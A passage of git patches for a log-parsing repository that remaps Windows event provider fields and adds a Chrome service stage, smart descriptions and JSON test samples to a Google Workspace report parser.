-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       }
     ]
@@ -513,7 +513,7 @@
         "value": 4750
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       }
     ]
@@ -533,7 +533,7 @@
         "value": 4768
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       }
     ]
@@ -553,7 +553,7 @@
         "value": 4768
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       },
       {
@@ -577,7 +577,7 @@
         "value": 4769
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       }
     ]
@@ -597,7 +597,7 @@
         "value": 4769
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       },
       {
@@ -621,7 +621,7 @@
         "value": 4771
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       }
     ]
@@ -641,7 +641,7 @@
         "value": 4776
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       },
       {
@@ -665,7 +665,7 @@
         "value": 4776
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       },
       {
@@ -694,7 +694,7 @@
         "value": 4778
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       },
       {
@@ -722,7 +722,7 @@
         "value": 4778
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       },
       {
@@ -745,7 +745,7 @@
         "value": 4778
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       }
     ]
@@ -770,7 +770,7 @@
         "value": 4778
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       },
       {
@@ -798,7 +798,7 @@
         "value": 4778
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       },
       {
@@ -821,7 +821,7 @@
         "value": 4778
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       }
     ]
@@ -846,7 +846,7 @@
         "value": 4778
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       },
       {
@@ -872,7 +872,7 @@
         "value": 4778
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       }
     ]
@@ -892,7 +892,7 @@
         "value": 4798
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       }
     ]
@@ -912,7 +912,7 @@
         "value": 4799
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       }
     ]
@@ -932,7 +932,7 @@
         "value": 4825
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       }
     ]
@@ -952,7 +952,7 @@
         "value": 4964
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       }
     ]
@@ -972,7 +972,7 @@
         "value": 4964
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       },
       {
@@ -995,7 +995,7 @@
         "value": 5140
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       }
     ]
@@ -1015,7 +1015,7 @@
         "value": 5140
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       },
       {
@@ -1039,7 +1039,7 @@
         "value": 5145
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       }
     ]
@@ -1059,7 +1059,7 @@
         "value": 5145
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       },
       {
@@ -1083,7 +1083,7 @@
         "value": 5156
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       }
     ]
@@ -1096,7 +1096,7 @@
         "value": 4103
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-PowerShell"
       }
     ]
@@ -1109,7 +1109,7 @@
         "value": 4104
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-PowerShell"
       }
     ]
@@ -1122,7 +1122,7 @@
         "value": 4104
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-PowerShell"
       }
     ]
@@ -1135,7 +1135,7 @@
         "value": 4105
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-PowerShell"
       }
     ]
@@ -1148,7 +1148,7 @@
         "value": 4106
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-PowerShell"
       }
     ]
@@ -1183,7 +1183,7 @@
         "value": 1
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Sysmon"
       },
       {
@@ -1224,7 +1224,7 @@
         "value": 1
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Sysmon"
       },
       {
@@ -1278,7 +1278,7 @@
         "value": 1
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Sysmon"
       },
       {
@@ -1327,7 +1327,7 @@
         "value": 1
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Sysmon"
       },
       {
@@ -1378,7 +1378,7 @@
         "value": 1
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Sysmon"
       },
       {
@@ -1415,7 +1415,7 @@
         "value": 2
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Sysmon"
       }
     ]
@@ -1435,7 +1435,7 @@
         "value": 3
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Sysmon"
       }
     ]
@@ -1448,7 +1448,7 @@
         "value": 11
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Sysmon"
       }
     ]
@@ -1465,7 +1465,7 @@
         "value": "CreateValue"
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Sysmon"
       }
     ]
@@ -1478,7 +1478,7 @@
         "value": 13
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Sysmon"
       }
     ]
@@ -1491,7 +1491,7 @@
         "value": 16
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Sysmon"
       }
     ]
@@ -1504,7 +1504,7 @@
         "value": 22
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Sysmon"
       }
     ]

From b1252eaca9c4f4450874f6f8943795476e8ed8e3 Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya <zakarya.toufiki@sekoia.io>
Date: Fri, 15 Nov 2024 11:36:26 +0100
Subject: [PATCH 236/317] apply linter

---
 Google Cloud/google-report/_meta/fields.yml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/Google Cloud/google-report/_meta/fields.yml b/Google Cloud/google-report/_meta/fields.yml
index 0e522bee5..ded77dffa 100644
--- a/Google Cloud/google-report/_meta/fields.yml	
+++ b/Google Cloud/google-report/_meta/fields.yml	
@@ -56,6 +56,7 @@ google.report.rule.severity:
 google.report.rule.type:
   description: Rule type
   name: google.report.rule.type
+
 google.report.saml.application_name:
   description: Saml SP application name
   name: google.report.saml.application_name

From 19a65a4d5e293e1d2fdbfa64529dc10caee206c9 Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya <zakarya.toufiki@sekoia.io>
Date: Fri, 15 Nov 2024 11:40:52 +0100
Subject: [PATCH 237/317] Fix smart desc

---
 Google Cloud/google-report/_meta/smart-descriptions.json | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json
index 4cf8bb8e7..9e00ad24a 100644
--- a/Google Cloud/google-report/_meta/smart-descriptions.json	
+++ b/Google Cloud/google-report/_meta/smart-descriptions.json	
@@ -215,6 +215,10 @@
       },
       {
         "field": "google.report.rule.type"
+      }
+    ]
+  },
+  {
     "value": "User {user.email} successfully logged in by {network.application} from {google.report.saml.application_name} with status: {google.report.saml.status_code}",
     "conditions": [
       {

From 9ff46d902883e220abb1678fe65f6151d46ab06c Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya <zakarya.toufiki@sekoia.io>
Date: Fri, 15 Nov 2024 11:44:32 +0100
Subject: [PATCH 238/317] Fix fields

---
 Google Cloud/google-report/_meta/fields.yml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/Google Cloud/google-report/_meta/fields.yml b/Google Cloud/google-report/_meta/fields.yml
index ded77dffa..21d6f4ee1 100644
--- a/Google Cloud/google-report/_meta/fields.yml	
+++ b/Google Cloud/google-report/_meta/fields.yml	
@@ -56,6 +56,7 @@ google.report.rule.severity:
 google.report.rule.type:
   description: Rule type
   name: google.report.rule.type
+  type: keyword
 
 google.report.saml.application_name:
   description: Saml SP application name

From c99c1228b8eba92184a6a6ca972ffea8034cd286 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Fri, 15 Nov 2024 12:03:00 +0100
Subject: [PATCH 239/317] test(Wallix): remove useless test

---
 Wallix/wallix-bastion/tests/rexec.json | 12 ------------
 1 file changed, 12 deletions(-)
 delete mode 100644 Wallix/wallix-bastion/tests/rexec.json

diff --git a/Wallix/wallix-bastion/tests/rexec.json b/Wallix/wallix-bastion/tests/rexec.json
deleted file mode 100644
index 14e87bd1a..000000000
--- a/Wallix/wallix-bastion/tests/rexec.json
+++ /dev/null
@@ -1,12 +0,0 @@
-{
-  "input": {
-    "message": "rexec line 15: Deprecated option UsePrivilegeSeparation"
-  },
-  "expected": {
-    "message": "rexec line 15: Deprecated option UsePrivilegeSeparation",
-    "event": {
-      "provider": "sshd"
-    },
-    "wallix": {}
-  }
-}
\ No newline at end of file

From 3c5145e8f49c9fd9c07d4f2af1d4cf491bdbbc35 Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya <zakarya.toufiki@sekoia.io>
Date: Fri, 15 Nov 2024 16:25:48 +0100
Subject: [PATCH 240/317] Add chrome service

---
 .../_meta/smart-descriptions.json             | 57 +++++++++++++++++++
 Google Cloud/google-report/ingest/parser.yml  | 20 +++++++
 .../tests/test_chrome_sample_1.json           | 47 +++++++++++++++
 .../tests/test_chrome_sample_2.json           | 45 +++++++++++++++
 4 files changed, 169 insertions(+)
 create mode 100644 Google Cloud/google-report/tests/test_chrome_sample_1.json
 create mode 100644 Google Cloud/google-report/tests/test_chrome_sample_2.json

diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json
index 6fa8c709a..0ac5acfe5 100644
--- a/Google Cloud/google-report/_meta/smart-descriptions.json	
+++ b/Google Cloud/google-report/_meta/smart-descriptions.json	
@@ -282,6 +282,63 @@
       }
     ]
   },
+  {
+    "value": "Device {device.model.name} with ID {device.id} is {event.action} in the {network.application} application",
+    "conditions": [
+      {
+        "field": "network.application",
+        "value": "chrome"
+      },
+      {
+        "field": "event.action",
+        "value": "CHROMEOS_PERIPHERAL_STATUS_UPDATED"
+      },
+      {
+        "field": "device.model.name"
+      },
+      {
+        "field": "device.id"
+      }
+    ]
+  },
+  {
+    "value": "The user on device model {device.model.name} logged out due to {event.reason}",
+    "conditions": [
+      {
+        "field": "network.application",
+        "value": "chrome"
+      },
+      {
+        "field": "event.action",
+        "value": "CHROME_OS_LOGOUT_EVENT"
+      },
+      {
+        "field": "event.reason"
+      },
+      {
+        "field": "device.model.name"
+      }
+    ]
+  },
+  {
+    "value": "The user on device model {device.model.name} log in due to {event.reason}",
+    "conditions": [
+      {
+        "field": "network.application",
+        "value": "chrome"
+      },
+      {
+        "field": "event.action",
+        "value": "CHROME_OS_LOGIN_EVENT"
+      },
+      {
+        "field": "event.reason"
+      },
+      {
+        "field": "device.model.name"
+      }
+    ]
+  },
   {
     "value": "{source.ip} with ID {user.id} changing in the {network.application} application",
     "conditions": [
diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml
index 3a0fce88f..c92e4bf32 100644
--- a/Google Cloud/google-report/ingest/parser.yml	
+++ b/Google Cloud/google-report/ingest/parser.yml	
@@ -30,6 +30,8 @@ pipeline:
     filter: '{{ json_event.message.id.applicationName == "vault"}}'
   - name: set_saml_fields
     filter: '{{ json_event.message.id.applicationName == "saml"}}'
+  - name: set_chrome_fields
+    filter: '{{ json_event.message.id.applicationName == "chrome"}}'
   - name: set_parameters_fields
     filter: '{{ json_event.message.events[0].name == "SUSPEND_USER"}}'
 
@@ -278,3 +280,21 @@ stages:
           event.type: ["denied"]
           event.reason: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "failure_type" %}{{param.value}}{% endif %}{% endfor %}'
         filter: '{{ json_event.message.events[0].name == "login_failure"}}'
+
+  set_chrome_fields:
+    actions:
+      - set:
+          event.category: ["web"]
+          organization.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "ORG_UNIT_NAME" %}{{param.value}}{% endif %}{% endfor %}'
+          event.reason: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "EVENT_REASON" %}{{param.value}}{% endif %}{% endfor %}'
+          device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_ID" %}{{param.value}}{% endif %}{% endfor %}'
+          device.model.identifier: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "DEVICE_NAME" %}{{param.value}}{% endif %}{% endfor %}'
+          device.model.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_NAME" %}{{param.value}}{% endif %}{% endfor %}'
+      
+      - set:
+          event.type: ["change"]
+        filter: '{{ json_event.message.events[0].name == "CHROMEOS_PERIPHERAL_STATUS_UPDATED"}}'
+
+      - set:
+          event.type: ["connection"]
+        filter: '{{ json_event.message.events[0].name in ["CHROME_OS_LOGOUT_EVENT", "CHROME_OS_LOGIN_EVENT"]}}'
diff --git a/Google Cloud/google-report/tests/test_chrome_sample_1.json b/Google Cloud/google-report/tests/test_chrome_sample_1.json
new file mode 100644
index 000000000..36c42d3d5
--- /dev/null
+++ b/Google Cloud/google-report/tests/test_chrome_sample_1.json	
@@ -0,0 +1,47 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Google Report",
+        "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd"
+      }
+    },
+    "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:17:42.050Z\",\"uniqueQualifier\":\"821596950209300000\",\"applicationName\":\"chrome\",\"customerId\":\"C01x70000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zF\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097979777777\"},\"events\":[{\"type\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE\",\"name\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731071860000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"},{\"name\":\"PRODUCT_ID\",\"value\":\"0x2\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"2.0 root hub\"},{\"name\":\"VENDOR_ID\",\"value\":\"0x1ddd\"},{\"name\":\"VENDOR_NAME\",\"value\":\"Linux Foundation\"}]}]}"
+  },
+  "expected": {
+    "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:17:42.050Z\",\"uniqueQualifier\":\"821596950209300000\",\"applicationName\":\"chrome\",\"customerId\":\"C01x70000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zF\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097979777777\"},\"events\":[{\"type\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE\",\"name\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731071860000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"},{\"name\":\"PRODUCT_ID\",\"value\":\"0x2\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"2.0 root hub\"},{\"name\":\"VENDOR_ID\",\"value\":\"0x1ddd\"},{\"name\":\"VENDOR_NAME\",\"value\":\"Linux Foundation\"}]}]}",
+    "event": {
+      "action": "CHROMEOS_PERIPHERAL_STATUS_UPDATED",
+      "category": [
+        "web"
+      ],
+      "dataset": "admin#reports#activity",
+      "reason": "CHROMEOS_PERIPHERAL_STATUS_UPDATED",
+      "type": [
+        "change"
+      ]
+    },
+    "@timestamp": "2024-11-08T13:17:42.050000Z",
+    "cloud": {
+      "account": {
+        "id": "C01x70000"
+      }
+    },
+    "device": {
+      "id": "0x2",
+      "model": {
+        "identifier": "S5NXNZ00A000000",
+        "name": "2.0 root hub"
+      }
+    },
+    "network": {
+      "application": "chrome"
+    },
+    "organization": {
+      "name": "test_org"
+    },
+    "user": {
+      "id": "105250506097979777777"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Google Cloud/google-report/tests/test_chrome_sample_2.json b/Google Cloud/google-report/tests/test_chrome_sample_2.json
new file mode 100644
index 000000000..49574fa28
--- /dev/null
+++ b/Google Cloud/google-report/tests/test_chrome_sample_2.json	
@@ -0,0 +1,45 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Google Report",
+        "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd"
+      }
+    },
+    "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:20:40.000Z\",\"uniqueQualifier\":\"-2392455694764444444444\",\"applicationName\":\"chrome\",\"customerId\":\"C01x7c000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097973333333333\"},\"events\":[{\"type\":\"CHROME_OS_LOGIN_LOGOUT_TYPE\",\"name\":\"CHROME_OS_LOGIN_EVENT\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731072040000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_KIOSK_SESSION_LOGIN\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"DEVICE_USER\",\"value\":\"-\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"}]}]}"
+  },
+  "expected": {
+    "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:20:40.000Z\",\"uniqueQualifier\":\"-2392455694764444444444\",\"applicationName\":\"chrome\",\"customerId\":\"C01x7c000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097973333333333\"},\"events\":[{\"type\":\"CHROME_OS_LOGIN_LOGOUT_TYPE\",\"name\":\"CHROME_OS_LOGIN_EVENT\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731072040000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_KIOSK_SESSION_LOGIN\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"DEVICE_USER\",\"value\":\"-\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"}]}]}",
+    "event": {
+      "action": "CHROME_OS_LOGIN_EVENT",
+      "category": [
+        "web"
+      ],
+      "dataset": "admin#reports#activity",
+      "reason": "CHROMEOS_KIOSK_SESSION_LOGIN",
+      "type": [
+        "connection"
+      ]
+    },
+    "@timestamp": "2024-11-08T13:20:40Z",
+    "cloud": {
+      "account": {
+        "id": "C01x7c000"
+      }
+    },
+    "device": {
+      "model": {
+        "identifier": "S5NXNZ00A000000"
+      }
+    },
+    "network": {
+      "application": "chrome"
+    },
+    "organization": {
+      "name": "test_org"
+    },
+    "user": {
+      "id": "105250506097973333333333"
+    }
+  }
+}
\ No newline at end of file

From 3221f63e4467bb80d815c9e37e2ce48f95f74b44 Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya <zakarya.toufiki@sekoia.io>
Date: Fri, 15 Nov 2024 16:27:24 +0100
Subject: [PATCH 241/317] Apply linter

---
 Google Cloud/google-report/ingest/parser.yml               | 2 +-
 Google Cloud/google-report/tests/test_chrome_sample_1.json | 4 ++--
 Google Cloud/google-report/tests/test_chrome_sample_2.json | 4 ++--
 3 files changed, 5 insertions(+), 5 deletions(-)

diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml
index c92e4bf32..2dde85fdb 100644
--- a/Google Cloud/google-report/ingest/parser.yml	
+++ b/Google Cloud/google-report/ingest/parser.yml	
@@ -290,7 +290,7 @@ stages:
           device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_ID" %}{{param.value}}{% endif %}{% endfor %}'
           device.model.identifier: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "DEVICE_NAME" %}{{param.value}}{% endif %}{% endfor %}'
           device.model.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_NAME" %}{{param.value}}{% endif %}{% endfor %}'
-      
+
       - set:
           event.type: ["change"]
         filter: '{{ json_event.message.events[0].name == "CHROMEOS_PERIPHERAL_STATUS_UPDATED"}}'
diff --git a/Google Cloud/google-report/tests/test_chrome_sample_1.json b/Google Cloud/google-report/tests/test_chrome_sample_1.json
index 36c42d3d5..e0e145d54 100644
--- a/Google Cloud/google-report/tests/test_chrome_sample_1.json	
+++ b/Google Cloud/google-report/tests/test_chrome_sample_1.json	
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:17:42.050Z\",\"uniqueQualifier\":\"821596950209300000\",\"applicationName\":\"chrome\",\"customerId\":\"C01x70000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zF\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097979777777\"},\"events\":[{\"type\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE\",\"name\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731071860000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"},{\"name\":\"PRODUCT_ID\",\"value\":\"0x2\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"2.0 root hub\"},{\"name\":\"VENDOR_ID\",\"value\":\"0x1ddd\"},{\"name\":\"VENDOR_NAME\",\"value\":\"Linux Foundation\"}]}]}",
     "sekoiaio": {
       "intake": {
         "dialect": "Google Report",
         "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd"
       }
-    },
-    "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:17:42.050Z\",\"uniqueQualifier\":\"821596950209300000\",\"applicationName\":\"chrome\",\"customerId\":\"C01x70000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zF\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097979777777\"},\"events\":[{\"type\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE\",\"name\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731071860000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"},{\"name\":\"PRODUCT_ID\",\"value\":\"0x2\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"2.0 root hub\"},{\"name\":\"VENDOR_ID\",\"value\":\"0x1ddd\"},{\"name\":\"VENDOR_NAME\",\"value\":\"Linux Foundation\"}]}]}"
+    }
   },
   "expected": {
     "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:17:42.050Z\",\"uniqueQualifier\":\"821596950209300000\",\"applicationName\":\"chrome\",\"customerId\":\"C01x70000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zF\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097979777777\"},\"events\":[{\"type\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE\",\"name\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731071860000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"},{\"name\":\"PRODUCT_ID\",\"value\":\"0x2\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"2.0 root hub\"},{\"name\":\"VENDOR_ID\",\"value\":\"0x1ddd\"},{\"name\":\"VENDOR_NAME\",\"value\":\"Linux Foundation\"}]}]}",
diff --git a/Google Cloud/google-report/tests/test_chrome_sample_2.json b/Google Cloud/google-report/tests/test_chrome_sample_2.json
index 49574fa28..ecbf27de3 100644
--- a/Google Cloud/google-report/tests/test_chrome_sample_2.json	
+++ b/Google Cloud/google-report/tests/test_chrome_sample_2.json	
@@ -1,12 +1,12 @@
 {
   "input": {
